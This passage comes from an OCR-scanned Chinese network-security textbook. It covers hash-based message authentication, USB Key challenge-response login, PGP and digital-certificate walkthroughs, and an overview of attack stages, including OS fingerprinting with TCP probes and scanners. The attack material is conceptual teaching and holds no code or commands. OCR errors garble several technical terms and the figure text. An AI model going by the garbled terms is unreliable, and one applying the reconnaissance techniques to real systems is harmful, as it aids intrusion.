数据 先 解密 后 校 验 。 如 果 解 密 的 码 值 和 产生 的 码 值 一 致 ， 则 可 以 证 实 该 消息 来 自 可 信赖 的 
发 送 方 ， 且 未 被 算 改 。 一 旦 消息 被 中 途 截 获 并 算 改 ， 那 么 消息 与 解密 的 校 验 码 就 不 能 一 一 
对 应 。 

通常 使 用 的 校 验 码 方案 有 奇偶 校 验 、 循 环 元 余 校 验 、 行 列 元 余 校 验 等 ， 它 们 产生 见 余 
码 的 方式 不 一 样 ， 其 见 余 码 长 度 随 着 消息 长 度 的 改变 而 改变 。 将 校 验 码 用 于 消息 认证 有 实 
现 简 单 、 检 测 能 力 强 的 特点 ， 同 时 认证 码 的 不 定 长 特点 为 穷 举 攻击 增加 了 一 定 的 难度 。 

2. 消息 摘要 方案 


消息 摘要 方案 利用 单 向 散 列 函数 将 任意 长 度 的 消息 全 文 作 为 输入 ， 将 压缩 到 某 一 固定 
长 度 的 哈 希 值 即 消息 摘要 或 称 为 “数字 指纹 ”作为 输出 。 这 种 消息 认证 码 方案 已 广泛 应 用 
于 数字 签名 ， 虚 拟 专 网 等 。 作 为 消息 认证 码 的 一 种 变形 ， 消 息 摘要 的 运算 过 程 不 需要 加 密 
算法 的 参与 ， 其 实现 的 关键 是 所 采用 的 单 向 散 列 函数 是 否 具有 良好 的 抗 碰撞 性 。Hash 函数 
值 是 所 有 消息 位 的 函数 ， 具 有 错误 检测 的 能 力 ， 经 过 函数 处 理 ， 原 始 信息 即使 只 改动 一 个 
字母 ， 对 应 的 压缩 信息 也 会 变 为 截然 不 同 的 摘要 ， 这 就 保证 了 被 处 理 信息 的 唯一 性 ， 为 电 
子 商 务 等 提供 了 数字 认证 的 可 能 。Hash 函数 值 可 由 如 下 形式 的 函数 表示 

=H(M) 
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现在 通用 的 算法 有 MD5、SHA-1、SHA-256 等 。 基 本 过 程 是 对 消息 原文 分 组 ， 附 加 填 
充 位 ， 附 加 长 度 ， 然 后 以 512 位 数据 块 为 单位 处 理 消息 ， 用 压缩 函数 模块 进行 4 次 循环 ， 
每 次 循环 包括 多 个 处 理 步骤 并 且 每 次 循环 的 函数 都 不 一 样 ， 最 后 才 生 成 消息 摘要 。 它 们 的 
区 别 在 于 计算 过 程 中 所 使 用 的 填充 方法 、 基 本 函数 、 初 始 向 量 和 运算 步 数 的 差别 。 

消息 摘要 的 实现 能 够 体现 出 该 Hash 函数 的 特点 。 

(1) 雪 骨 效应 : 明文 的 改变 导致 散 列 值 的 巨大 改变 。 

(2) 单 向 性 : 由 散 列 值得 到 消息 这 一 操作 是 不 可 能 的 。 

(3) 运算 速度 快 。 

3. 安全 性 分 析 

消息 认证 不 支持 可 逆 性 ， 是 多 对 一 的 函数 ， 其 定义 域 由 任意 长 的 消息 组 成 ， 而 值 域 则 
是 由 远 小 于 消息 长 度 的 比特 值 构成 。 从 理论 上 说 ， 一 定 存在 不 同 的 消息 产生 相同 的 宛 余 数 
据 块 ， 即 产生 碰撞 ， 因 此 必须 要 找到 一 种 足够 单 向 和 抗 碰撞 的 方法 进行 消息 认证 才 是 安 
全 的 。 

首先 ， 利 用 校 验 码 加 密 的 方式 构造 认证 码 ， 它 可 以 实现 数据 完整 性 ， 它 对 消息 不 可 抵 
赖 、 不 可 伪造 性 的 认证 性 能 取决 于 加 密 的 函数 。 因 此 这 种 方法 的 安全 性 取决 于 校 验 码 的 长 
度 和 加 密 的 方法 。 但 是 由 于 它 是 针对 局 部 变量 的 校 验 ， 比 如 针对 一 行 或 者 一 列 ， 它 的 抗 碰 
撞 性 能 不 是 很 好 ， 即 有 可 能 产生 消息 被 改动 ， 认 证 码 仍然 没有 变动 的 情况 。 

其 次 ， 对 于 用 单 向 散 列 函数 构造 认证 码 的 方式 来 说 ， 安 全 性 是 基于 该 函数 的 抗 强 碰撞 
性 的 ， 即 攻击 的 主要 目标 是 找到 一 对 或 更 多 对 碰撞 消息 ， 该 消息 生成 的 摘要 是 相同 的 。 在 
目前 已 有 的 攻击 方案 中 ， 一 些 是 基于 穷 举 的 ， 例 如 生日 攻击 方法 (生日 攻击 : 任 找 23 人 ， 
从 中 总 能 选 出 两 人 具有 相同 生日 的 概率 至 少 为 1/2)， 另 一 些 是 特殊 的 方法 ， 只 能 用 于 攻击 
某 些 特殊 类 型 的 Hash 方案 。 摘 要 的 长 度 是 抗 碰撞 的 一 个 关键 因素 。 

自从 2004 年 9 月 国际 密码 年 会 MD5 算法 被 攻陷 以 后 ，SHA 也 面临 被 攻陷 的 危险 ， 寻 
找 一 种 足够 安全 的 单 向 散 列 算法 来 代替 它 已 经 成 为 当务之急 ， 消 息 认证 码 实现 的 传统 途径 
也 将 会 改变 。 

消息 认证 技术 可 以 防止 数据 被 伪造 和 被 算 改 ， 以 及 证 实 消息 来 源 的 有 效 性 ， 已 广泛 应 
用 于 信息 网 络 。 随 着 密码 技术 的 发 展 与 计算 机 计算 能 力 的 提高 ， 消 息 认证 码 的 实现 方法 也 
在 不 断 的 改进 和 更 新 ， 多 种 实现 方式 会 为 更 安全 的 消息 认证 码 提供 保障 。 


2.3.4 认证 技术 的 实际 应 用 


以 北京 飞天 公司 的 ePass1000 为 例 , 说 明 使 用 USB Key 进行 身份 认证 的 过 程 .ePass1000 
内 署 单 向 散 列 算法 (MD5)， 预 先 在 ePass1000 和 服务 器 中 存储 一 个 证 明 用 户 身 份 的 密 钥 ( 共 
享 秘密 )， 当 需要 在 网 络 上 验证 用 户 身份 时 ， 先 由 客户 端 向 服务 器 发 出 一 个 验证 请 求 。 服 务 
器 接 到 此 请 求 后 生成 一 个 随机 数 并 通过 网 络 传输 给 客户 端 (此 为 冲击 )。 客 户 端 将 收 到 的 随 
机 数 提供 给 插 在 客户 端 USB 接口 上 的 ePass1000， 由 ePass1000 使 用 该 随机 数 与 存储 在 
ePass1000 中 的 密 钥 进行 带 密 钥 的 单 向 散 列 运 算 (HMAC-MD5) 并 得 到 一 个 结果 作为 认证 数 
据 传 给 服务 器 (此 为 响应 )。 与 此 同时 ， 服 务 器 也 使 用 该 随机 数 与 存储 在 服务 器 数据 库 中 的 
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该 客户 密 钥 进行 HMAC-MDS5 运算 , 如 果 服 务 器 的 运算 结果 与 客户 端 传 回 的 响应 结果 相同 ， 
则 认为 客户 端 是 一 个 合法 用 户 ， 如 图 2-12 所 示 。 


r 
! Serve ”一 UBKey 
i : R 
i 
i 
i 
i 
i 


1 | HMACMDSRKeY) | <? i | HMAC-MDS(R.Key) 
; 1 i 


图 2-12 USB Key 身份 认证 过 程 


图 中 “R” 代 表 服 务 器 提供 的 随机 数 ，“Key” 代 表 密 钥 ，“X” 代 表 随 机 数 和 密 钥 经 
过 HMAC-MD5 运算 后 的 结果 。 通 过 网 络 传输 的 只 有 随机 数 “R” 和 运算 结果 “了 X”， 用 户 
密 钥 “Key” 既 不 在 网 络 上 传输 也 不 在 客户 端 计算 机 内 存 中 出 现 ， 网 络 上 的 黑客 和 客户 端 
计算 机 中 的 木马 程序 都 无 法 得 到 用 户 的 密 钥 。 由 于 每 次 认证 过 程 使 用 的 随机 数 “R” 和 运算 
结果 “X” 都 不 一 样 , 即使 在 网 络 传输 的 过 程 中 认证 数据 被 黑客 截获 , 也 无 法 逆 推 获得 密 钥 。 
这 就 从 根本 上 保证 了 用 户 身份 无 法 被 仿冒 。 

冲击 响应 模式 可 以 保证 用 户 身份 不 被 仿冒 ， 却 无 法 保护 用 户 数据 在 网 络 传输 过 程 中 的 
安全 。 而 基于 PKI(Public Key Infrastructure， 公 和 钥 基 础 设施 ) 构 架 的 数字 证 书 认 证 方式 可 以 
有 效 保证 用 户 的 身份 安全 和 数据 安全 。 数 字 证 书 是 由 可 信任 的 第 三 方 认证 机 构 颁发 的 一 组 
包含 用 户 身份 信息 ( 密 钥 ) 的 数据 结构 , PKI 体系 通过 采用 密码 学 算法 构建 了 一 套 完善 的 流程 
并 保证 拥有 数字 证 书 的 持 有 人 的 身份 和 数据 安全 。 然而, 数字 证 书本 身 也 是 一 种 数字 身份 ， 
还 是 存在 被 复制 的 危险 ， 于 是 ，USB Key 作为 数字 证 书 存储 介质 为 实现 PKI 体系 安全 提供 
了 保障 。 使 用 USB Key 可 以 保证 用 户 数字 证 书 无 法 被 复制 ， 所 有 密 钥 运算 由 USB Key 实 
现 ， 用 户 密 钥 不 在 计算 机 内 存 出 现 也 不 在 网 络 中 传播 ， 只 有 USB Key 的 持 有 人 才能 够 对 数 
字 证 书 进行 操作 。 

由 于 USB Key 具有 安全 可 靠 、 便 于 携带 、 使 用 方便 、 成 本 低廉 的 优点 ， 加 上 PKI 体系 
完善 的 数据 保护 机 制 , 使 用 USB Key 存储 数字 证 书 的 认证 方式 已 经 成 为 目前 以 及 未 来 最 具 
有 前 景 的 主要 认证 模式 。 


24 应 用 实例 


2.4.1 ”加 密 应 用 


加 密 技 术 的 应 用 方式 很 多 ， 包 括 前 面 所 介绍 的 数字 签名 、 数 字 证 书 、 身 份 认 证 ， 还 包 
括 文件 加 密 、 电 子 邮 件 加 密 、 加 密 磁 碟 机 、USB Key 等 。 本 节 主 要 是 以 PGP 软件 为 例 ， 介 
绍 通过 一 个 加 密 软 件 PGP 加 密 文件 和 加 密 电子 邮件 的 方法 。 

PGP 的 创始 人 是 美国 的 Phil Zimmermann。 他 的 创造 性 在 于 他 把 RSA 公 钥 体系 的 方便 
性 和 传统 加 密 体 系 的 高 速度 结合 起 来 ， 并 且 在 数字 签名 和 密 钥 认证 管理 机 制 上 有 巧妙 的 设 
计 。 因 此 PGP 成 为 最 流行 的 公 钥 加 密 软件 包 。 

PGP(Pretty Good Privacy) 是 一 个 基于 RSA 公 钥 加 密 体系 的 邮件 加 密 软件 。 可 以 用 它 对 
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邮件 保密 以 防止 非 授权 者 阅读 ， 它 还 能 对 邮件 加 上 数字 签名 从 而 使 收 信人 可 以 确认 邮件 的 
发 送 者 ， 并 能 确信 邮件 没有 被 算 改 。 它 可 以 提供 一 种 安全 的 通信 方式 ， 而 事先 并 不 需要 任 
何 保密 的 渠道 来 传递 密 钥 。 它 采用 了 一 种 RSA 和 传统 加 密 的 杂 合算 法 ,用 于 数字 签名 的 邮 
件 文摘 算法 ， 加 密 前 压缩 等 ， 还 有 一 个 良好 的 人 机 工程 设计 。 它 的 功能 强大 ， 有 很 快 的 速 
度 ， 而 且 它 的 源 代 码 是 免费 的 。 

PGP 加 密 系 统 是 采用 公开 密 钥 加 密 与 传统 密 钥 加 密 相 结合 的 一 种 加 密 技术 。 它 使 月 
对 数学 上 相关 的 密 钥 ， 其 中 一 个 ( 公 钥 ) 用 来 加 密 信息 ， 另 一 个 ( 私 钥 ) 用 来 解密 信息 。 

PGP 采用 的 传统 加 密 技 术 部 分 所 使 用 的 密 钥 称 为 会 话 密 钥 。 每 次 使 用 时 ，PGP 都 随机 
产生 一 个 128 位 的 IDEA 会 话 密 钥 ， 用 来 加 密 报 文 。 公 开 密 钥 加 密 技术 中 的 公 钥 和 私 钥 则 
用 来 加 密会 话 密 铀 ， 并 通过 它 间接 地 保护 报 文 内 容 。 

PGP 核心 功能 是 : 文件 加 密 、 通 信 加 密 、 数 字 签 名 以 及 一 些 PGP 辅助 功能 ， 如 PGP 
的 密 钥 管理 机 制 。 

下 面 是 PGP 的 几 个 应 用 。 


1. 创建 并 导出 密 钥 对 
(1) 选择 “开始 ”|“ 程 序 ”| PGP | PGPkeys 命令 ， 启 动 PGPkeys， 如 图 2-13 所 示 。 


¥ 


sr help 


FT 


bh 是 到 


2-13 ”PGPkey 启动 界面 


(2) 单 击 Keys 下 拉 菜 单 中 的 new key 命令 或 单 击 第 一 个 小 图 标 ， 出 现 Key Generation 
Winzrad 提示 向 导 ， 单 击 Next 按钮 ， 开 始 创建 密 钥 对 。 

(3) 输入 全 名 和 邮件 地 址 (每 一 对 密 钥 都 对 应 着 一 个 确定 的 用 户 。 用 户 名 不 一 定 要 真 
实 ， 但 是 要 方便 通信 者 看 到 该 用 户 名 后 能 知道 这 个 用 户 名 对 应 的 真实 的 人 ; 邮件 地 址 也 是 
一 样 不 需要 真实 ， 但 是 要 能 方便 与 你 通信 的 人 在 多 个 公 钥 中 快速 的 找 出 你 的 公 钥 )， 如 
图 2-14 所 示 。 

(4) 在 要 求 输入 Passphrase 的 文本 框 中 ， 两 次 输入 Passphrase 并 再 次 确认 ; 这 里 的 
Passphrase 我 们 可 以 理解 是 保护 自己 私 钥 的 密码 ， 如 图 2-15 所 示 。 

(5) 在 PGP 完成 创建 密 钥 对 后 , 单 击 “ 下 一 步 ”按钮 。 单 击 “ 完 成 ”按钮 , 打开 PGPkeys 
主 界面 ， 如 图 2-16 所 示 。 找 到 并 展开 创建 的 密 钥 对 并 右 击 ， 在 弹出 的 快捷 菜单 中 选择 Key 
Properties 命令 。 

(6) 接着 导出 公 钥 ， 把 公 钥 作为 一 个 文件 保存 在 硬盘 上 。 并 把 公 钥 文件 作为 邮件 附件 


© 


(> 网络 雪人 管理 S 维 扩 


发 送 给 你 希望 进行 安全 通信 的 联系 人 。 选 择 Keys | Export 命令 ， 如 图 2-17 所 示 。 


Name and Email Assignment 
Every key pai must have a name associated withit The name and emal address let 
your corespondents | 


know that the public key they are using belongs to you 


Elname [ma 


By associaling an emall address Wih your key Pa. you wil enable PGP to assist your 
Corespondents n selecting the comect public key when communicating with you 


Emal addiess [aayshoo con en 


[KE=5@]F-* > 


图 2-14” 密 钥 生 成 界面 


Passphrase Assignment 
Your privale key wl be protected by a passphrase. Itis important that you keep this 
passphrase sectet and do not wile R down 


ete Met he Ss fer es rg nels oe 
norralphabetic char 


回 Hide Typing 


Passphtase | 


Passphrase Dualtr 
Contimation 
Cm ) 
图 2-15 输入 用 户口 令 


ew 玫 I 
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2-16 已 经 生成 的 密 钥 
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2. 文件 的 加 密 与 解密 

有 了 对 方 的 公 钥 之 后 就 可 以 用 对 方 公 钥 对 文件 进行 加 密 ， 然 后 再 传送 给 对 方 。 具 体操 
作 如 下 : 选中 要 加 密 的 文件 并 右 击 ， 然 后 在 弹出 的 快捷 菜单 中 选择 PGP | Encrypt 命令 ， 如 
图 2-18 所 示 。 


sim Cirlts 
Set as Defenlt Key CtrltD 


图 2-17 密 钥 的 导出 图 2-18 加 密 文件 
然后 在 密 钥 选择 对 话 框 中 ， 选 择 要 接收 文件 的 接收 者 。 注 意 ， 用 户 所 持 有 的 密 钥 全 部 
列 在 对 话 框 的 上 部 分 ， 选 择 要 接收 文件 人 的 公 钥 ， 将 其 公 钥 拖 到 对 话 框 的 下 部 分 
(Recipients)， 单 击 OK 按钮 ， 并 且 为 加 密 文件 设置 保存 路 径 和 文件 名 。 


:3 PCPshell - Key Selection Dialog 


Drag users from this list to the Recipients 1ist 


EE] na Candyahoo. com. en> 好 2043/1024 


x | cme | He | 


厂 Text Output 

厂 Input Is Text 

厂 监 pe Original 

厂 Conventional Encryption 

厂 Self Decrypting Archive 


图 2-19 选择 接收 者 
此 时 ， 你 就 可 以 把 该 加 密 文 件 传送 给 对 方 。 对 方 接收 到 该 加 密 文件 后 ， 选 中 该 文件 并 
右 击 ， 在 弹出 的 快捷 菜单 中 选择 Decrypt & Verify 命令 ， 如 图 2-20 所 示 。 
此 时 ， 要 求 输入 私 钥 的 密码 ， 输 入 完 后 ， 单 击 OK 按钮 即 可 。 接 下 来 ， 要 为 已 经 解密 
的 明文 文件 设置 保存 路 径 和 文件 名 。 保 存 后 ， 明 文 就 可 以 被 直接 查看 了 。 


(99 >》 网 络 安全 管理 与 维护 


潼 济 营 粕 半 ”车 澡 式 侣 上 革 负 到 招 卫 


到 条 加 到 压缩 文件 (入 ).… 
虱 添 加 到 "文件 .bt.rar(35) 

到 压 罗 并 E-mail..… 

隆 压 缩 到 文件 .btrar 并 Emal 


图 2-20 文件 解密 

3. 数字 签名 

由 于 公 钥 是 发 放 给 其 他 人 使 用 的 ， 那 么 在 公 钥 发 放 的 过 程 中 ， 存 在 公 钥 被 人 替换 的 可 
能 。 此 时 ， 若 有 一 个 人 对 此 公 钥 是 否 真 正 是 属于 某 个 用 户 的 公 钥 作出 证 明 ， 那 么 该 公 钥 的 
可 信 度 就 比较 高 。 如 果 A 很 熟悉 B， 并 且 能 断定 某 公 钥 是 B 的 ， 并 没有 人 把 该 公 钥 替换 
或 者 算 改 的 话 ， 那 么 A 可 以 对 B 的 公 钥 进行 数字 签名 ， 以 自己 的 名 义 保证 B 的 公 钥 的 真 
实 性 。 

4. 使 用 PGP 密 钥 对 加 密 邮件 


PGP 可 以 直接 嵌入 客户 端 Outlook 中 使 用 ， 在 发 送 之 前 ， 选 中 邮件 所 有 内 容 ， 右 击 任 
务 栏 中 的 PGP Encryption 图 标 即 可 完成 邮件 加 密 。 收 到 邮件 双击 打开 后 ， 单 击 Decrypt 
PGPMessage 图 标 ， 就 可 解密 邮件 。 


2.4.2 ”数字 证 书 应 用 


数字 证 书 主要 应 用 于 各 种 需要 身份 认证 的 场合 ， 目 前 除 广泛 应 用 于 网 上 银行 、 网 上 交 
易 等 商务 应 用 外 ， 数 字 证 书 还 可 以 应 用 于 发 送 安全 电子 邮件 、 加 密 文 件 等 方面 。 以 下 是 几 
个 数字 证 书 常用 的 应 用 实例 ， 从 中 可 以 了 解数 字 证 书 技术 及 其 应 用 。 

1. 保证 网 上 银行 的 安全 


只 要 你 申请 并 使 用 了 银行 提供 的 数字 证 书 ， 即 可 保证 网 上 银行 业务 的 安全 ， 即 使 黑客 
窃取 了 你 的 帐户 密码 ， 因 为 他 没有 你 的 数字 证 书 ， 所 以 也 无 法 进入 你 的 网 上 银行 帐户 。 

1) ”安装 根 证 书 

首先 到 银行 营业 厅 办 理 网 上 银行 申请 手续 ; 然后 登录 到 各 地 建设 银行 网 站 ， 单 击 网 站 
“同意 并 立即 下 载 根 证 书 ”， 将 弹出 下 载 根 证 书 的 对 话 框 ， 单 击 “ 保 存 ” 按 钮 ， 把 root'crt 
保存 到 你 的 硬盘 上 ; 双击 该 文件 ， 在 弹出 的 对 话 框 中 单 击 “ 安 装 证 书 ” 按 钮 ， 安 装 根 证 书 。 

2) ”生成 用 户 证 书 

接 下 来 要 填写 你 的 帐户 信息 ， 按 照 你 存折 上 的 信息 进行 填写 ,提交 表单 ， 单 击 “ 确 定 ” 
按钮 后 出 现 操作 成 功 提示 ， 记 住 你 的 帐号 和 密码 ; 进入 证 书 下 载 的 页 面 ， 单 击 “ 下 载 ” 按 
钮 ， 在 新 画面 选择 存放 证 书 的 介质 为 “本 机 硬盘 (高 级 加 密 强 度 )” 系 统 将 自动 安装 证 书 。 
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3) ”使 用 数字 证 书 

现在 ， 你 可 以 使 用 数字 证 书 来 确保 网 上 银行 的 安全 了 ， 建 议 你 把 数字 证 书 保存 在 USB 
盘 上 ， 使 用 网 上 银行 时 才 插 到 计算 机 上 ， 以 防止 证 书 被 盗 。 

2. 发 送 安全 邮件 

由 于 越 来 越 多 的 人 通过 电子 邮件 进行 重要 的 商务 活动 和 发 送 机 密 信息 ， 而 且 随 着 互联 
网 的 飞速 发 展 ， 这 类 应 用 会 更 加 频繁 ， 因 此 保证 邮件 的 真实 性 ( 即 不 被 他 人 伪造 和 不 被 其 他 
人 截取 和 偷 阅 ) 也 变 得 日 趋 重要 。 因 为 我 们 知道 ,用 许多 黑客 软件 能 够 很 容易 地 发 送 假 地 址 
邮件 和 匿名 邮件 ， 另 外 ， 即 使 是 正确 地 址 发 来 的 邮件 在 传递 途中 也 很 容易 被 别人 截取 并 阅 
读 , 这 些 对 于 重要 信件 来 说 是 难以 容忍 的 。 在 第 12 章 的 实 训 一 中 , 我 们 将 以 Outlook Express 
为 例 介 绍 发 送 安全 邮件 和 加 密 邮 件 的 具体 方法 。 


第 3 章 常见 的 网 络 攻 击 方法 与 防护 


拒绝 服务 攻击 
3.1 网 络 攻击 概述 


3.1.1 网 络 攻击 分 类 


当前 网 络 攻击 方法 的 运用 非常 灵活 。 从 攻击 的 目的 来 看 ， 可 以 有 拒绝 服务 攻击 (DoS)、 
获取 系统 权限 的 攻击 、 获 取 敏 感 信息 的 攻击 ;从 攻击 的 切入 点 来 看 ， 有 缓冲 区 溢出 攻击 、 
系统 设置 漏洞 的 攻击 等 ， 从 攻击 的 纵向 实施 过 程 来 看 ， 有 获取 初级 权限 的 攻击 、 提 升 最 高 
权限 的 攻击 、 后 门 攻击 、 跳 板 攻击 等 ， 从 攻击 的 类 型 来 看 ， 包 括 对 各 种 操作 系统 的 攻击 、 
对 网 络 设备 的 攻击 、 对 特定 应 用 系统 的 攻击 等 。 所 以 说 ， 很 难以 一 个 统一 的 模式 对 各 种 攻 
击 手 段 进行 分 类 。 

常见 的 攻击 方式 有 下 面 四 大 类 : 拒绝 服务 攻击 、 利 用 型 攻击 、 信 息 收 集 型 攻击 、 假 消 
息 攻击 。 

拒绝 服务 攻击 企图 通过 使 你 的 计算 机 崩溃 或 把 它 压 跨 来 阻止 你 提供 服务 。 拒 绝 服务 攻 
击 是 最 容易 实施 的 攻击 行为 ， 主 要 包括 : 死亡 之 ping、 泪 滴 、UDP 洪水 、SYN 洪水 、Land 
攻击 、Smurf 攻击 、Fraggle 攻击 、 电 子 邮 件 炸 弹 、 畸 形 消息 攻击 。 

利用 型 攻击 是 一 类 试图 直接 对 你 的 计算 机 进行 控制 的 攻击 ， 最 常见 的 有 3 种 : 口令 猜 
测 、 特 洛 伊 木马 、 缓 冲 区 溢出 。 

信息 收集 型 攻击 并 不 对 目标 本 身 造 成 危害 ， 如 名 所 示 ， 这 类 攻击 被 用 来 为 进一步 入 侵 
提供 有 用 的 信息 。 主 要 包括 : 扫描 技术 、 体 系 结构 刺探 、 利 用 信息 服务 。 

假 消息 攻击 用 于 攻击 目标 配置 不 正确 的 消息 ， 主 要 包括 DNS 高 速 缓存 污染 、 伪 造 电子 
邮件 。 


3.1.2 ”网络 攻击 步骤 
1. 攻击 的 准备 阶段 
入 侵 者 的 来 源 有 两 种 : 一 种 是 内 部 人 员 利 用 自己 的 工作 机 会 和 权限 来 获取 不 应 该 获取 
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的 权限 而 进行 的 攻击 ; 另 一 种 是 外 部 人 员 入 侵 ， 包 括 远 程 入 侵 、 网 络 节点 接 入 入 侵 等 。 网 
络 攻击 主要 也 就 是 远程 攻击 。 

进行 网 络 攻击 是 一 件 系统 性 很 强 的 工作 ， 其 主要 工作 流程 是 : 收集 情报 ， 远 程 攻击 ， 
远程 登录 ， 取 得 普通 用 户 的 权限 ， 取 得 超级 用 户 的 权限 ， 留 下 后 门 ， 清 除 日 志 。 主 要 内 容 
包括 目标 分 析 ， 文 档 获取 ， 破 解密 码 ， 日 志清 除 等 技术 ， 下 面 分 别 介绍 。 

1) ”确定 攻击 的 目的 

攻击 者 在 进行 一 次 完整 的 攻击 之 前 首先 要 确定 攻击 要 达到 什么 样 的 目的 ， 即 给 对 方 造 
成 什么 样 的 后 果 。 常 见 的 攻击 目的 有 破坏 型 和 入 侵 型 两 种 。 破 坏 型 攻击 指 的 只 是 破坏 攻击 
目标 ， 使 其 不 能 正常 工作 ， 而 不 能 随意 控制 目标 系统 的 运行 。 要 达到 破坏 型 攻击 的 目的 ， 
主要 的 手段 是 使 用 拒绝 服务 攻击 (Denial of Service)。 另 一 类 常见 的 攻击 目的 是 入 侵 攻 击 目 
标 ， 这 种 攻击 是 要 获得 一 定 的 权限 来 达到 控制 攻击 目标 的 目的 。 应 该 说 这 种 攻击 比 破坏 型 
攻击 更 为 普遍 ， 威 胁 性 更 大 。 因 为 黑客 一 旦 获取 攻击 目标 的 管理 员 权限 就 可 以 对 此 服务 器 
做 任意 动作 ， 进 行 破坏 。 此 类 攻击 一 般 也 是 利用 服务 器 操作 系统 、 应 用 软件 或 者 网 络 协议 
存在 的 漏洞 进行 的 。 当 然 还 有 另 一 种 造成 此 种 攻击 的 原因 就 是 密码 泄露 ， 攻 击 者 靠 猜测 或 
者 穷 举 法 来 得 到 服务 器 用 户 的 密码 ， 然 后 就 可 以 和 真正 的 管理 员 一 样 对 服务 器 进行 访问 。 

2) “信息 收集 

除了 确定 攻击 目的 之 外 , 攻击 前 的 最 主要 工作 就 是 收集 尽量 多 的 关于 攻击 目标 的 信息 。 
这 些 信 息 主要 包括 目标 的 操作 系统 类 型 及 版 本 ， 目 标 提供 哪些 服务 ， 各 服务 器 程序 的 类 型 
与 版 本 以 及 相关 的 社会 信息 。 

要 攻击 一 台 计算 机 ， 首 先 要 确定 它 上 面 正在 运行 的 操作 系统 是 什么 ， 因 为 对 于 不 同类 
型 的 操作 系统 ， 其 上 的 系统 漏洞 有 很 大 区 别 ， 所 以 攻击 的 方法 也 完全 不 同 ， 甚 至 同一 种 操 
作 系 统 的 不 同 版 本 的 系统 漏洞 也 是 不 一 样 的 。 要 确定 一 台 服 务 器 的 操作 系统 一 般 是 靠 经 验 ， 
有 些 服务 器 的 某 些 服务 显示 信息 会 泄露 其 操作 系统 。 例 如 当 我 们 通过 Telnet 连 上 一 台 计 算 
机 时 ， 如 果 显 示 : 

Unix(r) System V Release 4.0 

login: 
根据 经 验 就 可 以 确定 这 个 计算 机 上 运行 的 操作 系统 为 SUN OS 5.5 或 5.5.1。 但 这 样 确定 操作 
系统 类 型 是 不 准确 的 ， 因 为 有 些 网 站 管理 员 为 了 迷惑 攻击 者 会 故意 更 改 显示 信息 ， 造 成 
假象 。 

还 有 一 种 不 是 很 有 效 的 方法 ， 诸 如 查询 DNS( 域 名 系统 ) 的 主机 信息 来 看 登记 域名 时 的 
申请 计算 机 类 型 和 操作 系统 类 型 ， 或 者 使 用 社会 工程 学 的 方法 来 获得 ， 以 及 利用 某 些 主机 
开放 的 SNMP( 简 单 网 络 管理 协议 ) 的 公共 组 来 查询 。 

另外 一 种 相对 比较 准确 的 方法 是 利用 网 络 操作 系统 里 的 TCP/IP 堆栈 作为 特殊 的 “ 指 
纹 ” 来 确定 系统 的 真正 身份 。 因 为 不 同 的 操作 系统 在 网 络 底层 协议 的 各 种 实现 细节 上 上 略 有 
不 同 。 可 以 通过 远程 向 目标 发 送 特殊 的 包 ， 然 后 通过 返回 的 包 来 确定 操作 系统 类 型 。 例 如 
通过 向 目标 机 发 送 一 个 FIN 的 包 ( 或 者 是 任何 没有 ACK 或 SYN 标记 的 包 ) 到 目标 主机 的 一 
个 开放 的 端口 然后 等 待 回 应 。 许 多 系统 如 Windows、BSDI、Cisco、HP/UX 和 IRIX 会 返回 
一 个 RESET。 通过 发 送 一 个 SYN 包 , 它 含有 没有 定义 的 TCP 标记 的 TCP 头 , 那么 在 Linux 
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系统 的 回应 包 就 会 包含 这 个 没有 定义 的 标记 ， 而 在 一 些 别 的 系统 则 会 在 收 到 SYN+BOGU 
包 之 后 关闭 连接 。 或 是 利用 寻找 初始 化 序列 长 度 模板 与 特定 的 操作 系统 相 匹 配 的 方法 。 利 
用 它 可 以 对 许多 系统 分 类 ， 如 较 早 的 UNIX 系统 是 64KB 的 长 度 ， 一 些 新 的 UNIX 系统 的 
长 度 则 是 随机 增长 。 还 有 就 是 检查 返回 包 里 的 窗口 长 度 ， 这 项 技术 根据 各 个 操作 系统 的 不 
同 ， 其 初始 化 窗口 大 小 不 同 来 唯一 确定 它们 。 利 用 这 种 技术 的 工具 很 多 ， 比 较 著名 的 有 
NMAP、CHECKOS、QUESO 等 。 
获知 目标 提供 哪些 服务 及 各 服务 daemon 的 类 型 、 版 本 同样 非常 重要 ， 因 为 已 知 的 漏 
洞 一 般 都 是 针对 某 一 服务 的 。 这 里 说 的 提供 服务 就 是 指 通常 我 们 提 到 的 端口 ， 例 如 一 般 
TELNET 在 23 端口 FTP 在 21 端口 ，WWW 在 80 端口 或 8080 端口 ， 这 只 是 一 般 情况 ， 
网 站 管理 完全 可 以 按 自己 的 意愿 修改 服务 所 监听 的 端口 号 。 在 不 同 服务 器 上 提供 同一 种 服 
务 的 软件 也 可 以 是 不 同 ， 我 们 管 这 种 软件 叫做 Daemon， 例 如 同样 是 提供 FTP 服务 ， 可 以 
使 用 wuftp、proftp、ncftp 等 许多 不 同 种 类 的 Daemon。Daemon 的 类 型 版 本 也 有 助 于 黑客 利 

另外 需要 获得 的 关于 系统 的 信息 就 是 一 些 与 计算 机 本 身 没有 关系 的 社会 信息 ， 例 如 网 
站 所 属 公司 的 名 称 、 规 模 ， 网 络 管理 员 的 生活 习惯 、 电 话 号 码 等。 这 些 信息 看 起 来 与 攻击 
-个 网 站 没有 关系 ， 实 际 上 很 多 黑客 都 是 利用 了 这 类 信息 攻破 网 站 的 。 例 如 有 些 网 站 管理 
员 用 自己 的 电话 号 码 做 系统 密码 ， 如 果 掌 握 了 该 电话 号 码 ， 就 等 于 掌握 了 管理 员 权 限 进行 
信息 收集 ， 可 以 用 手工 进行 ， 也 可 以 利用 工具 来 完成 ， 完 成 信息 收集 的 工具 叫做 扫描 器 。 
用 扫描 器 收集 信息 的 优点 是 速度 快 ， 可 以 一 次 对 多 个 目标 进行 扫描 。 

2. 攻击 的 实施 阶段 


1) ”获得 权限 

当 收 集 到 足够 的 信息 之 后 ， 攻 击 者 就 要 开始 实施 攻击 行动 了 。 作 为 破坏 性 攻击 ， 只 需 
利用 工具 发 动 攻击 即 可 。 而 作为 入 侵 性 攻击 ， 往 往 要 利用 收集 到 的 信息 ， 找 到 系统 漏洞 ， 
然后 利用 该 漏洞 获取 一 定 的 权限 。 有 时 获得 了 一 般 用 户 的 权限 就 足以 达到 修改 主页 等 目的 
了 ， 但 作为 一 次 完整 的 攻击 是 要 获得 系统 最 高 权限 的 ， 这 不 仅 能 达到 一 定 的 目的 ， 更 重要 
的 是 证 明了 攻击 者 的 能 力 ， 这 也 符合 黑客 的 追求 。 

